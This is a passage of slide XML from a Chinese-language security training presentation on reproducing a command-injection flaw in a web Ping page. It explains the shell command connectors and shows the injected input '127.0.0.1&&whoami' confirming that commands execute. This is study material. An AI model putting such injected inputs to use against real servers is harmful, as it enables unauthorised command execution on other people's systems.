              <a:t>参数的值，向服务器请求敏感文件或执行恶意文件，导致信息泄露或远程代码执行（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="360680" y="2442845"/>
            <a:ext cx="6439535" cy="183134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3" name="文本框 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2232977" y="3290442"/>
            <a:ext cx="7649845" cy="1106805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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命令执行漏洞</a:t>
            </a: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复现</a:t>
            </a:r>
            <a:endPar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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="72" name="组合 71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4497707" y="2357310"/>
            <a:ext cx="3088005" cy="617855"/>
            <a:chOff x="6683" y="5071"/>
            <a:chExt cx="4863" cy="973"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6683" y="5071"/>
              <a:ext cx="4863" cy="973"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="0060E4">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="019FE1"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0060E4">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="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8" name="文本框 67"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7555" y="5098"/>
              <a:ext cx="3119" cy="919"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <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rPr>
                <a:t>Part 04</a:t>
              </a:r>
              <a:endPar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pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="图片 99"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3122751" y="6350"/>
            <a:ext cx="6775809" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-160655" y="779145"/>
            <a:ext cx="3844290" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>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1</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、思维</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导图</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887095" y="-12700"/>
            <a:ext cx="13079095" cy="6870700"/>
            <a:chOff x="-1397" y="0"/>
            <a:chExt cx="20597"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397" y="1"/>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2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691515" y="292100"/>
            <a:ext cx="5412740" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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3</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、命令执行漏洞（低</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危）</a:t>
            </a:r>
            <a:endPar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pic>
        <p:nvPicPr>
          <p:cNvPr id="1468780241" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298575" y="2107565"/>
            <a:ext cx="9800590" cy="4270375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298575" y="1299845"/>
            <a:ext cx="9286240" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>发现页面是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2098784089" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1388110" y="1902460"/>
            <a:ext cx="9121140" cy="4321810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1374140" y="1143635"/>
            <a:ext cx="9286240" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>尝试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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18" name="文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1374140" y="1143635"/>
            <a:ext cx="9286240" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>结果与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>终端（下图）无太大区别：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1207488964" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1374140" y="1755140"/>
            <a:ext cx="9047480" cy="4648835"/>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18" name="文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1374140" y="1894205"/>
            <a:ext cx="9286240" cy="3415030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在操作系统中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|| ” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>都可以作为命令连接符使用，用户通过浏览器提交执行命令，由于服务器端没有针对执行函数做过滤，导致在没有指定绝对路径的情况下就执行命令。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>区别为</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>关注的是命令如何运行和传递数据。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>后台运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>并行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>传递输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>串行数据处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>关注的是命令是否执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于前一个命令的成败</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>成功才执行下一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>都成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>||:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>失败才执行下一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>提供备选</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</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18" name="文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163955" y="5876925"/>
            <a:ext cx="9286240" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>说明存在过滤，由回显的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请求找不到主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 127.0.0.1whoami”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可以大概猜测源码可能将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分隔符替换为空白字符</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2047836847" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1374140" y="1267460"/>
            <a:ext cx="8726170" cy="4322445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163955" y="455295"/>
            <a:ext cx="9286240" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分隔符尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>127.0.0.1&amp;&amp;whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>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18" name="文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163955" y="5876925"/>
            <a:ext cx="9286240" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>发现未执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ping 127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>而是直接执行了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令，确认存在命令执行漏洞，可使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
